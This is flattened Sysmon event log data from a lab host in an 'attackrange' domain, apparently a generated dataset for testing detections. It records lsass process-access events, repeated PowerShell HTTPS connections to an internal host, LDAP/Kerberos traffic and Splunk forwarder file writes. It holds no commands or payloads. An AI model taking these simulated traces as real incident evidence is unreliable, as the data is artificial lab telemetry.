Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1034BD90208140A5E1D2D9A49CA67FCD,SHA256=501F0F10C12DE6F7416188372686A1878D5B28529E0E71A9917EFB0BB0AE9129,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035128515Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:48.302{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128514Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:48.302{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128513Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:48.302{B81B27B7-4012-611D-0B00-00000000C801}6361736C:\Windows\system32\lsass.exe{B81B27B7-4013-611D-1600-00000000C801}1196C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035128520Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:13.932{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62163-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128519Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:49.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56741511B00C16C9618B4BBF3C1F79FF,SHA256=71373512365BCF0673A9721BF71A60F0A0FECF72C58C51C2A1E0761D51BA5326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128518Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:49.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AE96EBF1A56008046056E8C5011B1451,SHA256=2F68386C2873224E2E4C430DF97EFF3A4B4063EF7C14EF8B48B25CD761EF003B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128517Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:49.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0EB3AB03EF3F04526D168639A1A268AB,SHA256=D36D999CC42DD2B67B049B39483A98202FCEC4255772A4A42EAFE23BBAC02528,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128516Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:49.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=58EBA5A15C739D289F6C82B49A5457AB,SHA256=AB350B9C2F46B37B371CA0937C5BE3CA27500BB8D204AC199903828C4ADFB0A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128526Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:14.493{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local62167-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035128525Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:14.133{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local62166-false10.0.1.14WIN-DC-128389ldap 354300x800000000000000035128524Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:14.114{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62165-false10.0.1.14WIN-DC-12888kerberos 354300x800000000000000035128523Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:14.111{B81B27B7-8397-613A-DC96-03000000C801}4768C:\Windows\System32\wbem\WmiPrvSE.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local62164-false10.0.1.14WIN-DC-128389ldap 22542200x800000000000000035128522Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:14.107{B81B27B7-8397-613A-DC96-03000000C801}4768win-dc-128.attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\wbem\WmiPrvSE.exe 23542300x800000000000000035128521Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:50.051{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=358F7A8E7EE45334A5D0E0F9C7760F06,SHA256=D9C8E26F5EDFEA3F5C5E519367071E4E311A092CBF1B1000151E96C930C83BC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128528Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:16.383{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62168-false10.0.1.12-8000- 23542300x800000000000000035128527Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:51.099{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4DE24EB722C456617E2EC5C103517BA,SHA256=E6D367223E62C1567D548E682405853E89141AB7459E2897B32B03A413C75C43,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128531Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:52.506{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D63ED2EFD794B0A400741CD188A5F53A,SHA256=FCC967E38A03CF668592C6CA1A2D0CF8AF6DFDAB9921104A943CB9F3E22AF26E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128530Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:52.471{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=56741511B00C16C9618B4BBF3C1F79FF,SHA256=71373512365BCF0673A9721BF71A60F0A0FECF72C58C51C2A1E0761D51BA5326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128529Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:52.106{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F15BDCC5CA24033F07879482D66EE0BC,SHA256=64B712B26D541736356A8406A85F510193996B05F280950E2B08CE05B6462AB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128533Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:17.938{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62169-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128532Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:53.121{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5574342EF592F4081C67DB322250C8C,SHA256=FCFCA6ED216A330F5DA5C2A07814AA121D07B4C7C70CDAAEB349DC7A20D6F8EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128534Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:54.169{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD16B23058ACC52E9CCF87A1178D7430,SHA256=20D0A5A7424497E7885DDED6D1121315674637F5714B3F3CBF948BEA143528A8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128535Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:55.204{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF9DB3FE5E4F7E7EE8C5AA8A6A6E5C5D,SHA256=61866A7F94760B6175C655815BC3FDDCD29ACF38FB4752F47F1F967878603509,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128536Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:56.234{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D10758D23437DACD0D85B8686538DFF9,SHA256=777B993CC5F71DF6BD770C971E1A2EEFE1A8B266A9C472510DAB12BCC24D98DA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128538Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:22.248{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62170-false10.0.1.12-8000- 23542300x800000000000000035128537Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:57.266{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD771C80C6C1AD8043E4029DBDF768E4,SHA256=1004A135FAA392799192CFFF64C0E01A343EE120A00A5F06A1BC7C8451697873,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128541Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:58.884{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5B0DC4D67869F9C52D42D9B304CE2137,SHA256=DE066E104249A9FF24CD833F5DA2D5F2B8B55E1C3D33CCB87BB66B7D49C0773A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035128540Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 21:58:58.700{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7a5c5-0xe43c3165) 23542300x800000000000000035128539Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:58.285{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB88E523E1176F9529A70B5ECE27AACD,SHA256=0333DC6D9109D5973CA69846430D58C7065B5CF8D226239BDF3C33927FD47076,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:59.699{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02884E933425682347DF68D4FCA53C54,SHA256=8F29689C54AC205EEDF1AA604943AACBBADA19E04EB85D32C8D8AAE3AD574CB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128544Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:59.699{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CE260F47CDEE24B1FB591D3A9BA9F3D,SHA256=C26ECA92831B6DA62357768C0EAB13AEE52F1D3D5A83E26C80B84C628671C5A7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128543Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:23.969{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62171-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128542Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:58:59.331{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A973076D0C11D3F21B274E8264BEE5,SHA256=44F501BC1E443BADB9AA3F2C9FB670CF16B82EA547EB8B3BBDF2E857616014A9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128548Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:24.866{B81B27B7-4012-611D-1000-00000000C801}976C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-987.attackrange.local123ntpfalse10.0.1.14WIN-DC-128123ntp 23542300x800000000000000035128547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:00.346{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF2A439A5DD6CA1E51F3314F787F31D6,SHA256=378B68BECD4978F9058D508DB3490A3C0763A2D0F8C7294DB97D95CB26616C20,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:00.066{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128553Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:26.228{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62172-false10.0.1.12-8089- 10341000x800000000000000035128552Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:01.567{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128551Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:01.567{B81B27B7-4012-611D-0C00-00000000C801}7324308C:\Windows\system32\svchost.exe{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035128550Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:01.567{B81B27B7-4012-611D-0B00-00000000C801}6366252C:\Windows\system32\lsass.exe{B81B27B7-4012-611D-0A00-00000000C801}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035128549Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:01.398{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5AC9C10B5255C745F2A48820A7490077,SHA256=5C3E6BD6CFD8A481F4F6258C881673B40EAA55D6A23E10D7355F38812FC3F205,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.312{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62173-false10.0.1.12-8000- 23542300x800000000000000035128556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:02.582{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C78C6CD32EF2B2EDA778F5108B05148F,SHA256=D66A4862B8C77D67446F9E9D092AF279D19481C0A7045B9555AB6811EA1CBBD7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128555Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:02.582{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=B6550CB2090531511F3519A9C559AD0F,SHA256=F2C87423E6F855785863BB90CDAB396302153D8C312D1891CCAD1E2D2F7FE340,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128554Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:02.429{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F2861BEC3D67CDF9F09402128285083,SHA256=6BC10C6A20EF5F1BCC68E6971A0F2B1C49381B1D6CE57BF4719BB5F2A404E007,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:27.768{B81B27B7-4012-611D-1400-00000000C801}884C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruefalse10.0.1.15win-host-987.attackrange.local62174-false8.253.133.91-80http 23542300x800000000000000035128559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:03.813{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=EA6D29001FF0003849FF9189EC787BFE,SHA256=B4FBA0695F4E29712FF73B402FFF3700C50C771A0A7503993FDB699FEB4D723E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035128558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:03.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE12BE4599C5C522F90211F8CA799427,SHA256=CDBC97BA956D6A280550F20BA2357BDA4566903B38AC421FD2457D0308DF3DA9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035128562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:28.980{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62175-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035128561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:59:04.481{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 